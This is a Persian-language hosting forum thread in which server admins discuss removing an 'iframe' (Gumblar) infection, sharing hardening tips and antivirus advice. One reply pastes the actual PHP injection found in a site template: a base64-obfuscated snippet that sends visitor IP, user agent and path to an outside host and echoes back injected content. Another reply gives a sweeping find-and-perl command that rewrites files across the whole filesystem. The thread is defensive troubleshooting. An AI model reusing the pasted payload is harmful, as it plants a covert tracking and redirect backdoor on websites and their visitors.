با سلام
آیا کسی با ویروس iferem آشنایی داره و تجریه همچین ویروسی را روی سرورش داشته؟
و راهی برای remove کردن این ویروس را تجربه کرده است؟
قابل ذکر است که انواع آنتی ویروس ها تست شده همچنین ترانسفر هم شد اما باز ویروس از بین نرفت.
اگر کسی تجربش رو داره ممنون میشم اطلاعات بده و راهنمای کنه.

ممنون

سلام

من توی چند تا DB سایتهای Antivirus جستجو کردم ولی چنین virus پیدا نکردم . لطفا اسم کامل send بشه
و اینکه شما اگه از CXS استفاده کنید 99% پاک میکنه ولی FREE نیست

این ویروسش معروفه و نامش iFrame virus هست.
میاد تو فایلها مخصوصا فایلهای php یک کد iframe میذاره که سورسش ویروسیه.
بعد از مدتی گوگل و فایرفاکس کل سایتهای سرور شما رو ویروسی اخطار میدن.

اگه بتونیم اینجا واسش راهی پیدا کنیم بدرد خیلیا میخوره.

سلام

همون CXS میتونه این کار رو انجام بده ( محصول configserver.com )

و لینک پایین رو هم یه چک کنید
SOSWebScan Iframe Badware,Virus,Malware removal utility (http://hubpages.com/hub/SOSWebScan-Iframe-Badware-removal-utility)

سلام
من هم با اینگونه ویروس برخوردم که به این شکل است pe362f3384519b.php وقتی کپی میشه تو هاست عملکرد کل هاست را مخطل میکنه.
راهی وجود داره که از بین ببریم چنین ویروسی را ؟؟
نمونه هم ضمیمه کردم

سلام
register_globals off
allow_url_fopen off
disable_functions = system,exec
mod_security نصب کنید و تنضیمات رو انجام بدید(rules)
FTP anonymouse رو غیرفعال کنید

اسم ویروس گامبلار هست که توسط انتی ویروس آواست براحتی قابل شناسایی هست

این ویروس از طریق اف تی پی به هاست و فایل های سرایت می کنه

تنها راهش اینه فایل های آلوده رو حذف کنید و مجددا فایل سالم آپلود کنید و پرمیشن فایل های Config.php و فایلهای با پسوند js. رو 444 قرار بدید و پسورد اف تی پی رو هم یک پسورد پیچیده و سخت بذارید و همینطور کامپیوتر خودتون رو با آنتی ویروس Avast پاکسازی کنید.

در ضمن این ویروس منبع اصلیش از طریق قرار دادن لینک باکس های iframe میباشد.مثل همین اکسینادز و ... بیشتر این جور سرویس دهنده ها کدهاشون آلوده هستند و باعث میشه همه جا سرایت کنه..من خودم چند بار به همین درد مبتلا شدم. اما وقتی این کد تبلیغاتی رو از سایتم پاک کردم چند روز بعد از لیست آلوده های گوگل بیرون آمدم. تنها راهش هم اینه که فایلهای آلوده سایت رو کلا نابود کنید و برای پیشگیری به کاربراتون بگید از گزاشتن کدهای تبلیغاتی ifram در سایت جلوگیری کنند.. این کار رو حتی بلاگفا هم کرده و گزاشتن کدهای تبلیغاتی رو تو وبلاگها ممنوع کرده

اگه مشکل روی تعداد زیادی از فایلها هست که قبلا گفتم CXS رو install کنید

ولی اگه خودتون دوست دارید دستی این کار رو انجام بدید :

میتونید توی فایلتون iframe Tag رو زیر Body و یا Head Tag پاک کنید و بعدش هم permission فایل رو set کنید که دوباره این اتفاق نیفته

فرمایشات شما کاملا متین ولی روش های بالا تست شد...
avast یکی از بهترین هاست و تقریبا" 4 سالی است که استفاده می کنم و راضی هستم
اما برای حل این مشکل در سرور کافیست که دستور زیر را در ssh اجرا کنید تا کامل این کد از سایت های آلوده پاک شود :

find / -type f -mtime -10 | xargs grep -l '<iframe'| xargs perl -pi -e 's/^.*\<iframe.*$/ /g'

به جای <iframe میبایست کدی که iframe به سایت آلوده اضافه می کند را وارد کنید.
البته تا 1 ساعت بعد از اجرای دستور صبر کنید تا جستجو انجام بشه و کد پاک بشود.
این دستور ابتدا کد را پیدا کرده در مرحله بعد پاک کرده و به جای کد iframe یک space قرار می دهد.

موفق باشید.

فرمایشات شما کاملا متین ولی روش های بالا تست شد...
Avast یکی از بهترین هاست و تقریبا" 4 سالی است که استفاده می کنم و راضی هستم
اما برای حل این مشکل در سرور کافیست که دستور زیر را در ssh اجرا کنید تا کامل این کد از سایت های آلوده پاک شود :

Find / -type f -mtime -10 | xargs grep -l '<iframe'| xargs perl -pi -e 's/^.*\<iframe.*$/ /g'

به جای <iframe میبایست کدی که iframe به سایت آلوده اضافه می کند را وارد کنید.
البته تا 1 ساعت بعد از اجرای دستور صبر کنید تا جستجو انجام بشه و کد پاک بشود.
این دستور ابتدا کد را پیدا کرده در مرحله بعد پاک کرده و به جای کد iframe یک space قرار می دهد.

موفق باشید.

در کدوم قسمت کامندتون باید کد رو قرار بدند ، آیفرم اولی یا دومی ؟

سلام
متاسقانه سایت منم همین ویروس رو گرفته البته امروز گرفت وقتی آبدیت کردم
همه کد ها رو تست کردن هیچی اضافه نشده
سایت هم Html هستش
من فقط 2 تا فایل رو ادیت کردم ولی الان همه صفخات ایت جوری شده
برای من فقط یه کد تبلیغاتی هستش که به سایت دیگه رو باز میکنه
راهی نداره ؟

واقعا کسی نمیتونه برای این malware راه حلی ارائه بده؟
این همه مهندس داریم فقط میگن هاستو حذف کن از دوباره بریز. خوب اینم که خودمون بلدیم.

واقعا کسی نمیتونه برای این malware راه حلی ارائه بده؟
این همه مهندس داریم فقط میگن هاستو حذف کن از دوباره بریز. خوب اینم که خودمون بلدیم.

شما و همه دوستان توجه کنید وقتی ویندوز نصب کردین همون اول کار kasperski internet security2013 نصب کنید امنیت سیتم تضمین میکنه چون قدرتش خیلی بالا از cloud protection استفاده میکنه

منم همین مشکل رو امشب تو سایتم دیدم اینم آی فرم که درستش کرده بود / این کد رو تو صفحه ایندکس قالب حذف کردم درست شد


<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQuc Ghw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

اگه نمی تونی درستش کنی پی ام بده خودم واست حلش میکنم

دوستانی که iframe رو حذف میکنن و بعدش میگن درست شد توجه کنن همون صفحه بازم تا یکی دو هفته دیگه مجدد iframe میگیره.
من یه راه حل خود دارم:
1 - آنتی emisoft anti malware یا کسپر 2013 اول رو سیستموتون نصب کنید و اسکن کنید و همه تروجانها رو حذف کنید. (emisoft anti malware تخصصش شناسایی و حذف malware و تروجانه)
2 - به سایتتون رفته ویروس iframe رو از سایت حذف کرده و سطح دسترسی فایل های htm , html و java رو 444 بکنید.
دوستان اگه راه سریعتری دارن پیشنهاد بدن.